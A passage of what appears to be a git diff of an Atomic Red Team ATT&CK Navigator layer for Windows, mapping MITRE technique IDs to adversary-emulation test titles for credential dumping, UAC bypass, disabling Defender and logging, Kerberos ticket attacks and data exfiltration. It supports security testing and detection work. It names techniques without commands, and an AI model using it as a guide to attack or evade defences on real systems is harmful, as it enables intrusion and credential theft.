Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":57,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted 